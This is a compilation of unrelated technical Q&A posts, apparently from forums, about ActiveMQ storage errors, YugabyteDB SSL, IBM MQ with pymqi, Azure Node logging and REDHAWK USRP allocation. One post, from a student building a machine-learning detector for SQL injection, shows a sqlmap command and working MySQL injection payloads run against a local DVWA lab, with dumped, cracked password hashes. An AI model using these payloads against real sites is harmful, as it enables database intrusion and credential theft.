I am facing a problem of messages getting stuck in an ActiveMQ queue (master-slave configuration): consumers cannot consume messages when I pump around ~100 messages into different queues.
I have configured the ActiveMQ (v5.9.0) message broker on two separate Linux instances in master-slave mode. For the persistenceAdapter configuration, I have mounted the same NAS storage onto both instances where the ActiveMQ server is running, at the mount point '/mnt/nas'. The size of the NAS storage is 20 GB.
So my persistenceAdapter configuration looks like this:
<persistenceAdapter>
<kahaDB directory="/mnt/nas" ignoreMissingJournalfiles="true" checkForCorruptJournalFiles="true" checksumJournalFiles="true"/>
</persistenceAdapter>
The systemUsage configuration on both ActiveMQ servers is:
<systemUsage>
    <systemUsage>
        <memoryUsage>
            <memoryUsage percentOfJvmHeap="70"/>
        </memoryUsage>
        <storeUsage>
            <storeUsage limit="15 gb"/>
        </storeUsage>
        <tempUsage>
            <tempUsage limit="7 gb"/>
        </tempUsage>
    </systemUsage>
</systemUsage>
and I have enabled only the 'tcp' transport connector:
<transportConnector name="openwire" uri="tcp://0.0.0.0:61616?maximumConnections=1000&amp;wireFormat.maxFrameSize=104857600"/>
When I check the partition details of the mount point '/mnt/nas' on both ActiveMQ instances with the command df -k, I see the following:
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/xvda2 102953264 5840280 91883264 6% /
tmpfs 967652 0 967652 0% /dev/shm
/dev/xvda1 253871 52511 188253 22% /boot
//nas151.service.softlayer.com/IBM278684-16
139328579072 56369051136 82959527936 41% /mnt/nas
So 41% of /mnt/nas is used.
The problem is when I start the activemq server (on both instances), I see the following messages in the activemq.log
**************** START ***************
2014-06-05 12:48:40,350 | INFO | PListStore:[/var/lib/apache-activemq-5.9.0/data/localhost/tmp_storage] started | org.apache.activemq.store.kahadb.plist.PListStoreImpl | main
2014-06-05 12:48:40,454 | INFO | JMX consoles can connect to service:jmx:rmi:///jndi/rmi://localhost:1099/jmxrmi | org.apache.activemq.broker.jmx.ManagementContext | JMX connector
2014-06-05 12:48:40,457 | INFO | Using Persistence Adapter: KahaDBPersistenceAdapter[/mnt/nas] | org.apache.activemq.broker.BrokerService | main
2014-06-05 12:48:40,612 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 8163..8209 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,613 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 12256..12327 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,649 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 20420..20585 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,650 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 28559..28749 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,651 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 32677..32842 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,652 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 36770..36960 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,655 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 49099..49264 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,657 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 61403..61474 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,658 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 65521..65567 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,659 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 69614..69685 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,660 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 77778..77824 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:41,543 | INFO | KahaDB is version 5 | org.apache.activemq.store.kahadb.MessageDatabase | main
2014-06-05 12:48:41,592 | INFO | Recovering from the journal ... | org.apache.activemq.store.kahadb.MessageDatabase | main
2014-06-05 12:48:41,604 | INFO | Recovery replayed 66 operations from the journal in 0.028 seconds. | org.apache.activemq.store.kahadb.MessageDatabase | main
2014-06-05 12:48:41,772 | INFO | Apache ActiveMQ 5.9.0 (localhost, ID:10.106.99.101-60576-1401972521638-0:1) is starting | org.apache.activemq.broker.BrokerService | main
2014-06-05 12:48:41,892 | INFO | Listening for connections at: tcp://10.106.99.101:61616?maximumConnections=1000&wireFormat.maxFrameSize=104857600 | org.apache.activemq.transport.TransportServerThreadSupport | main
2014-06-05 12:48:41,893 | INFO | Connector openwire started | org.apache.activemq.broker.TransportConnector | main
2014-06-05 12:48:41,893 | INFO | Apache ActiveMQ 5.9.0 (localhost, ID:10.106.99.101-60576-1401972521638-0:1) started | org.apache.activemq.broker.BrokerService | main
2014-06-05 12:48:41,893 | INFO | For help or more information please see: http://activemq.apache.org | org.apache.activemq.broker.BrokerService | main
2014-06-05 12:48:41,897 | WARN | Store limit is 2048 mb, whilst the data directory: /mnt/nas only has 0 mb of usable space - resetting to maximum available disk space: 0 mb | org.apache.activemq.broker.BrokerService | main
2014-06-05 12:48:41,897 | ERROR | Store limit is 0 mb, whilst the max journal file size for the store is: 32 mb, the store will not accept any data when used. | org.apache.activemq.broker.BrokerService | main
******************** END **************
I see 'Corrupt journal records found in /mnt/nas/db-1.log' on every restart, even if I delete that file before restarting.
I had already set the recovery flags (ignoreMissingJournalfiles, checkForCorruptJournalFiles, checksumJournalFiles), but this log entry still appears on every restart.
Another problem: even though my NAS storage is 20 GB, the broker reports '/mnt/nas only has 0 mb of usable space'. This is really weird; I am not sure why 0 MB is reported as available to ActiveMQ.
I would appreciate any suggestions on why this is happening, and any better configuration to avoid messages getting stuck in the queue.
Thanks
Raagu
[Question posted by a user on YugabyteDB Community Slack]
I'm running a yb-cluster of 3 logical nodes on 1 VM, with SSL mode enabled. Below are the commands and the config file I am using to start the cluster with SSL mode on:
./bin/yugabyted start --config /data/ybd1/config_1.config
./bin/yugabyted start --base_dir=/data/ybd2 --listen=127.0.0.2 --join=192.168.56.12
./bin/yugabyted start --base_dir=/data/ybd3 --listen=127.0.0.3 --join=192.168.56.12
my config file:
{
  "base_dir": "/data/ybd1",
  "listen": "192.168.56.12",
  "certs_dir": "/root/192.168.56.12/",
  "allow_insecure_connections": "false",
  "use_node_to_node_encryption": "true",
  "use_client_to_server_encryption": "true"
}
I am able to connect using:
bin/ysqlsh -h 127.0.0.3 -U yugabyte -d yugabyte
ysqlsh (11.2-YB-2.11.1.0-b0)
Type "help" for help.
yugabyte=# \l
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------------+----------+----------+---------+-------------+-----------------------
postgres | postgres | UTF8 | C | en_US.UTF-8 |
system_platform | postgres | UTF8 | C | en_US.UTF-8 |
template0 | postgres | UTF8 | C | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | C | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
yugabyte | postgres | UTF8 | C | en_US.UTF-8 |
But when I try to connect to the yb-cluster from a psql client, I get the errors below:
psql -h 192.168.56.12 -p 5433
psql: error: connection to server at "192.168.56.12", port 5433 failed: FATAL: Timed out: OpenTable RPC (request call id 2) to 192.168.56.12:9100 timed out after 120.000s
postgres#acff2570dfbc:~$
And in the yb-tserver logs I see these errors:
I0228 05:00:21.248733 21631 async_initializer.cc:90] Successfully built ybclient
2022-02-28 05:02:21.248 UTC [21624] FATAL: Timed out: OpenTable RPC (request call id 2) to 192.168.56.12:9100 timed out after 120.000s
I0228 05:02:21.251086 21627 poller.cc:66] Poll stopped: Service unavailable (yb/rpc/scheduler.cc:80): Scheduler is shutting down (system error 108)
2022-02-28 05:54:20.987 UTC [23729] LOG: invalid length of startup packet
Any help in this regard is really appreciated.
You're setting your config the wrong way for the yugabyted tool. You want to use --master_flags and --tserver_flags, as explained in the docs: https://docs.yugabyte.com/latest/reference/configuration/yugabyted/#flags.
An example:
bin/yugabyted start --base_dir=/data/ybd1 --listen=192.168.56.12 --tserver_flags=use_client_to_server_encryption=true,ysql_enable_auth=true,use_cassandra_authentication=true,certs_for_client_dir=/root/192.168.56.12/
Sending the parameters this way should work on your cluster.
I'm writing a thesis for my university.
The topic of my thesis is "SQL injection detection using Machine Learning".
To apply machine learning, I first need thousands of training examples of SQL injection attacks.
For that, I followed the process below:
1. Install VirtualBox
2. Install Kali Linux on VirtualBox
3. Install DVWA (Damn Vulnerable Web Application) on Kali Linux
4. Attack DVWA using sqlmap
In step 4, I succeeded in attacking DVWA, but I don't know how to collect a large amount of attack data.
What I want is the actual attack SQL statements that were sent.
1. Launched the server:
┌──(root💀kali)-[/home/kali]
└─# service apache2 start
┌──(root💀kali)-[/home/kali]
└─# service mysql start
2. Got the cookie and target URL:
document.cookie
"security=low; PHPSESSID=cookieinfo"
3. Attack:
┌──(root💀kali)-[/usr/bin]
└─# sqlmap -o -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[cookieinfo];security=low" --dump
___
__H__
___ ___[,]_____ ___ ___ {1.4.11#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting # 10:08:01 /2020-12-01/
[10:08:01] [INFO] resuming back-end DBMS 'mysql'
[10:08:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1995 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(1995=1995,1))),0x71626a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qoRd&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9863 FROM (SELECT(SLEEP(5)))PIFI)-- JYNK&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7162707a71,0x744e45686f7a55414a6744636c497367666d62567679764247415656677779516a76584474645269,0x71626a7871)#&Submit=Submit
---
[10:08:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:08:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:08:01] [INFO] fetching current database
[10:08:01] [INFO] fetching tables for database: 'dvwa'
[10:08:01] [INFO] fetching columns for table 'users' in database 'dvwa'
[10:08:01] [INFO] fetching entries for table 'users' in database 'dvwa'
[10:08:01] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[10:08:07] [INFO] writing hashes to a temporary file '/tmp/sqlmaphbMPEH3181/sqlmaphashes-7QbpSl.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:08:12] [INFO] using hash method 'md5_generic_passwd'
[10:08:12] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[10:08:12] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:08:12] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:08:12] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
Database: dvwa
Table: users
[5 entries]
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar | user | password | last_name | first_name | last_login | failed_login |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | /DVWA-master/hackable/users/admin.jpg | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2020-11-29 01:54:52 | 0 |
| 2 | /DVWA-master/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2020-11-29 01:54:52 | 0 |
| 3 | /DVWA-master/hackable/users/1337.jpg | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2020-11-29 01:54:52 | 0 |
| 4 | /DVWA-master/hackable/users/pablo.jpg | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2020-11-29 01:54:52 | 0 |
| 5 | /DVWA-master/hackable/users/smithy.jpg | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2020-11-29 01:54:52 | 0 |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
[10:08:12] [INFO] table 'dvwa.users' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/users.csv'
[10:08:12] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[10:08:12] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
Database: dvwa
Table: guestbook
[1 entry]
+------------+------+-------------------------+
| comment_id | name | comment |
+------------+------+-------------------------+
| 1 | test | This is a test comment. |
+------------+------+-------------------------+
[10:08:13] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/guestbook.csv'
[10:08:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost'
[*] ending # 10:08:13 /2020-12-01/
Again: what I want to get is the actual attack SQL statements that sqlmap sent.
Please, anyone, help me. Thank you.
I am getting the error below while connecting to IBM MQ using the pymqi library.
It's a clustered MQ channel.
Traceback (most recent call last):
File "postToQueue.py", line 432, in <module>
qmgr = pymqi.connect(queue_manager, channel, conn_info)
File "C:\Python\lib\site-packages\pymqi\__init__.py", line 2608, in connect
qmgr.connect_tcp_client(queue_manager or '', CD(), channel, conn_info, user, password)
File "C:\Python\lib\site-packages\pymqi\__init__.py", line 1441, in connect_tcp_client
self.connect_with_options(name, cd, user=user, password=password)
File "C:\Python\lib\site-packages\pymqi\__init__.py", line 1423, in connect_with_options
raise MQMIError(rv[1], rv[2])
pymqi.MQMIError: MQI Error. Comp: 2, Reason 2012: FAILED: MQRC_ENVIRONMENT_ERROR'
Please see my code below.
import pymqi

queue_manager = 'queue manager name here'
channel = 'channel name here'
host = 'host name here'
port = '2333'
queue_name = 'queue name here'
message = 'my message here'
conn_info = '%s(%s)' % (host, port)
print(conn_info)

qmgr = pymqi.connect(queue_manager, channel, conn_info)
queue = pymqi.Queue(qmgr, queue_name)
queue.put(message)
print("message sent")
queue.close()
qmgr.disconnect()
Getting error at the line below
qmgr = pymqi.connect(queue_manager, channel, conn_info)
I added the IBM MQ client to the Python Scripts folder as well. I am using Windows 10, Python 3.8.1, and the IBM MQ 9.1 Windows client installation image. Below is the header of the FDC file that is produced:
+-----------------------------------------------------------------------------+
| |
| WebSphere MQ First Failure Symptom Report |
| ========================================= |
| |
| Date/Time :- Tue January 28 2020 16:27:51 Eastern Standard Time |
| UTC Time :- 1580246871.853000 |
| UTC Time Offset :- -300 (Eastern Standard Time) |
| Host Name :- CA-LDLD0SQ2 |
| Operating System :- Windows 10 Enterprise x64 Edition, Build 17763 |
| PIDS :- 5724H7251 |
| LVLS :- 8.0.0.11 |
| Product Long Name :- IBM MQ for Windows (x64 platform) |
| Vendor :- IBM |
| O/S Registered :- 0 |
| Data Path :- C:\Python\Scripts\IBM |
| Installation Path :- C:\Python |
| Installation Name :- MQNI08000011 (126) |
| License Type :- Unknown |
| Probe Id :- XC207013 |
| Application Name :- MQM |
| Component :- xxxInitialize |
| SCCS Info :- F:\build\slot1\p800_P\src\lib\cs\amqxeida.c, |
| Line Number :- 5085 |
| Build Date :- Dec 12 2018 |
| Build Level :- p800-011-181212.1 |
| Build Type :- IKAP - (Production) |
| UserID :- alekhya.machiraju |
| Process Name :- C:\Python\python.exe |
| Arguments :- |
| Addressing mode :- 32-bit |
| Process :- 00010908 |
| Thread :- 00000001 |
| Session :- 00000001 |
| UserApp :- TRUE |
| Last HQC :- 0.0.0-0 |
| Last HSHMEMB :- 0.0.0-0 |
| Last ObjectName :- |
| Major Errorcode :- xecF_E_UNEXPECTED_SYSTEM_RC |
| Minor Errorcode :- OK |
| Probe Type :- INCORROUT |
| Probe Severity :- 2 |
| Probe Description :- AMQ6090: MQM could not display the text for error |
| 536895781. |
| FDCSequenceNumber :- 0 |
| Comment1 :- WinNT error 1082155270 from Open ccsid.tbl. |
| |
+-----------------------------------------------------------------------------+
I have a Node.js API app on Azure. I use bunyan to log every request to stdout. How can I save and read the log files? I enabled BLOB logging, but the only thing that shows up in my storage is a bunch of CSV files. Here is an example:
| date | level | applicationName | instanceId | eventId | pid | tid | message
_______________________________________________________________________________________________________________________________________________________________
| 2017-05-17T14:21:15 | Verbose | myApp | tae9d6 | 636306276755847146 | 13192 | -1 | SnapshotHelper::RestoreSnapshotInternal SUCCESS - File.Copy
| 2017-05-17T14:21:15 | Verbose | myApp | tae9d6 | 636306276756784690 | 13192 | -1 | SnapshotHelper::RestoreSnapshotInternal SUCCESS - process
Where are the logs that I printed to stdout?
1) Create a file iisnode.yml in your root folder (D:\home\site\wwwroot) if it does not exist.
2) Add the following lines to it:
loggingEnabled: true
logDirectory: iisnode
Once that is done, you can find the logs (everything your app writes to stdout/stderr) in D:\home\site\wwwroot\iisnode.
For more info, please refer to https://learn.microsoft.com/en-us/azure/app-service-web/web-sites-nodejs-debug#enable-logging.
With the settings above in iisnode.yml, the logs you see in D:\home\site\wwwroot\iisnode come from the file system or from BLOB storage, depending on how diagnostics is configured.
I'm using REDHAWK 1.10.0 on a 64-bit CentOS 6.5 machine with a USRP B100 and UHD driver 3.7.2.
The USRP B100 is recognized correctly by the system. It is a USB device.
I downloaded the latest version of the USRP_UHD Device ver. 3.0 for REDHAWK and created a Node including a GPP and a USRP_UHD device.
The Node starts without any problem, but when I run a simple waveform to read data from the USRP as an RX_DIGITIZER, I get the following error:
Failed to create application: usrp_test_248_173059195 Failed to satisfy 'usesdevice'
dependencies DCE:18964b3d-392e-4b98-a90d-0569b5d46ffefor application 'usrp_test_248_173059195'
IDL:CF/ApplicationFactory/CreateApplicationError:1.0
The Device Manager log reports:
2014-09-05 17:31:03 TRACE FrontendTunerDevice:369 - CORBA::Boolean frontend::FrontendTunerDevice<TunerStatusStructType>::allocateCapacity(const CF::Properties&) [with TunerStatusStructType = frontend_tuner_status_struct_struct]
2014-09-05 17:31:03 INFO FrontendTunerDevice:502 - allocateCapacity: NO AVAILABLE TUNER. Make sure that the device has an initialized frontend_tuner_status
2014-09-05 17:31:03 TRACE FrontendTunerDevice:578 - void frontend::FrontendTunerDevice<TunerStatusStructType>::deallocateCapacity(const CF::Properties&) [with TunerStatusStructType = frontend_tuner_status_struct_struct]
2014-09-05 17:31:03 DEBUG FrontendTunerDevice:603 - ALLOCATION_ID NOT FOUND: [usrpAllocation]
2014-09-05 17:31:03 DEBUG FrontendTunerDevice:637 - ERROR WHEN DEALLOCATING. SKIPPING...
The Node console:
2014-09-05 17:31:39 TRACE ApplicationFactory_impl:2132 - Done building Component Info From SPD File
2014-09-05 17:31:39 TRACE ApplicationFactory_impl:1040 - Application has 1 usesdevice dependencies
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::allocation_id
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::bandwidth
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::center_frequency
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::group_id
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::rf_flow_id
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::sample_rate
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::tuner_type
2014-09-05 17:31:39 TRACE AllocationManager_impl:134 - Servicing 1 allocation request(s)
2014-09-05 17:31:39 TRACE AllocationManager_impl:144 - Allocation request DCE:18964b3d-392e-4b98-a90d-0569b5d46ffe contains 3 properties
2014-09-05 17:31:39 TRACE AllocationManager_impl:243 - Allocating against device uhd_node:USRP_UHD_1
2014-09-05 17:31:39 TRACE AllocationManager_impl:353 - Matching DCE:cdc5ee18-7ceb-4ae6-bf4c-31f983179b4d 'FRONTEND::TUNER' eq 'FRONTEND::TUNER'
2014-09-05 17:31:39 TRACE AllocationManager_impl:353 - Matching DCE:0f99b2e4-9903-4631-9846-ff349d18ecfb 'USRP' eq 'USRP'
2014-09-05 17:31:39 TRACE AllocationManager_impl:395 - Adding external property FRONTEND::tuner_allocation
2014-09-05 17:31:39 TRACE AllocationManager_impl:407 - Matched 2 properties
2014-09-05 17:31:39 TRACE AllocationManager_impl:264 - Allocating 1 properties (1 calls)
2014-09-05 17:31:39 TRACE AllocationManager_impl:267 - Device lacks sufficient capacity
2014-09-05 17:31:39 TRACE AllocationManager_impl:243 - Allocating against device uhd_node:GPP_1
2014-09-05 17:31:39 TRACE AllocationManager_impl:353 - Matching DCE:cdc5ee18-7ceb-4ae6-bf4c-31f983179b4d 'GPP' eq 'FRONTEND::TUNER'
2014-09-05 17:31:39 TRACE AllocationManager_impl:248 - Matching failed
2014-09-05 17:31:39 DEBUG ApplicationFactory_impl:1060 - Failed to satisfy 'usesdevice' dependencies DCE:18964b3d-392e-4b98-a90d-0569b5d46ffefor application 'usrp_test_248_173059195'
2014-09-05 17:31:39 TRACE ApplicationFactory_impl:528 - Unbinding the naming context
2014-09-05 17:31:39 TRACE Properties:85 - Destruction for properties
2014-09-05 17:31:39 TRACE PRF:312 - Deleting PRF containing 4 properties
I used the following parameters:
<usesdevicedependencies>
<usesdevice id="DCE:18964b3d-392e-4b98-a90d-0569b5d46ffe"
type="usesUSRP">
<propertyref refid="DCE:cdc5ee18-7ceb-4ae6-bf4c-31f983179b4d"
value="FRONTEND::TUNER" />
<propertyref refid="DCE:0f99b2e4-9903-4631-9846-ff349d18ecfb"
value="USRP" />
<structref refid="FRONTEND::tuner_allocation">
<simpleref refid="FRONTEND::tuner_allocation::tuner_type"
value="RX_DIGITIZER" />
<simpleref refid="FRONTEND::tuner_allocation::allocation_id"
value="usrpAllocation" />
<simpleref refid="FRONTEND::tuner_allocation::center_frequency"
value="102500000" />
<simpleref refid="FRONTEND::tuner_allocation::bandwidth"
value="320000" />
<simpleref refid="FRONTEND::tuner_allocation::sample_rate"
value="250000" />
<simpleref refid="FRONTEND::tuner_allocation::group_id"
value="" />
<simpleref refid="FRONTEND::tuner_allocation::rf_flow_id"
value="" />
</structref>
</usesdevice>
</usesdevicedependencies>
The b100 configuration is the following:
-- USRP-B100 clock control: 10
-- r_counter: 2
-- a_counter: 0
-- b_counter: 20
-- prescaler: 8
-- vco_divider: 5
-- chan_divider: 5
-- vco_rate: 1600.000000MHz
-- chan_rate: 320.000000MHz
-- out_rate: 64.000000MHz
--
_____________________________________________________
/
| Device: B-Series Device
| _____________________________________________________
| /
| | Mboard: B100
| | revision: 8192
| | serial: E5R10Z1B1
| | FW Version: 4.0
| | FPGA Version: 11.4
| |
| | Time sources: none, external, _external_
| | Clock sources: internal, external, auto
| | Sensors: ref_locked
| | _____________________________________________________
| | /
| | | RX DSP: 0
| | | Freq range: -32.000 to 32.000 Mhz
| | _____________________________________________________
| | /
| | | RX Dboard: A
| | | ID: WBX v3, WBX v3 + Simple GDB (0x0057)
| | | Serial: E5R1BW6XW
| | | _____________________________________________________
| | | /
| | | | RX Frontend: 0
| | | | Name: WBXv3 RX+GDB
| | | | Antennas: TX/RX, RX2, CAL
| | | | Sensors: lo_locked
| | | | Freq range: 68.750 to 2200.000 Mhz
| | | | Gain range PGA0: 0.0 to 31.5 step 0.5 dB
| | | | Connection Type: IQ
| | | | Uses LO offset: No
| | | _____________________________________________________
| | | /
| | | | RX Codec: A
| | | | Name: ad9522
| | | | Gain range pga: 0.0 to 20.0 step 1.0 dB
| | _____________________________________________________
| | /
| | | TX DSP: 0
| | | Freq range: -32.000 to 32.000 Mhz
| | _____________________________________________________
| | /
| | | TX Dboard: A
| | | ID: WBX v3 (0x0056)
| | | Serial: E5R1BW6XW
| | | _____________________________________________________
| | | /
| | | | TX Frontend: 0
| | | | Name: WBXv3 TX+GDB
| | | | Antennas: TX/RX, CAL
| | | | Sensors: lo_locked
| | | | Freq range: 68.750 to 2200.000 Mhz
| | | | Gain range PGA0: 0.0 to 31.0 step 1.0 dB
| | | | Connection Type: IQ
| | | | Uses LO offset: No
| | | _____________________________________________________
| | | /
| | | | TX Codec: A
| | | | Name: ad9522
| | | | Gain range pga: -20.0 to 0.0 step 0.1 dB
Where is my mistake?
Thanks in advance for any help.
The frontend_tuner_status struct sequence is what defines the device capabilities and capacity. If the sequence is empty, the allocation will always result in lack of capacity. An empty frontend_tuner_status property is usually the result of not specifying the target device, or not being able to find the specified target device.
You must specify the target device using the target_device struct property. This can be done within the Node or at run-time. Previous versions of the USRP_UHD REDHAWK Device only allowed the IP address to be specified using a property, but in order to support USB-connected (and in general, non-network-connected) USRP devices, this has been replaced with the target_device struct property.
The target_device property allows the user to specify ip_address, name, serial, or type, and will use the first USRP hardware device that meets the criteria, if one is found. The information that should be specified in the target_device struct can be determined by setting the update_available_devices property to true, causing the available_devices struct sequence to be populated with all found devices (the same devices and information that is reported by the command line tool uhd_find_devices).
To determine whether the USRP_UHD REDHAWK Device is connected to a target device, inspect its properties: the frontend_tuner_status sequence will be empty if the Device is not linked to a hardware device, as will the device_motherboards and device_channels properties.
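For example, within the Node's configuration you could pre-set the struct along these lines. This is a hypothetical sketch only: the field ids below (serial, type) are inferred from the description above, and the serial is the one from the uhd_find_devices-style listing in the question, so verify both against your installed USRP_UHD Device's .prf.xml before use.

<!-- Hypothetical example: select the USRP by serial number.
     Field ids are inferred from the description above; verify
     them against the USRP_UHD Device's .prf.xml before use. -->
<structref refid="target_device">
  <simpleref refid="target_device::serial" value="E5R10Z1B1"/>
  <simpleref refid="target_device::type" value="b100"/>
</structref>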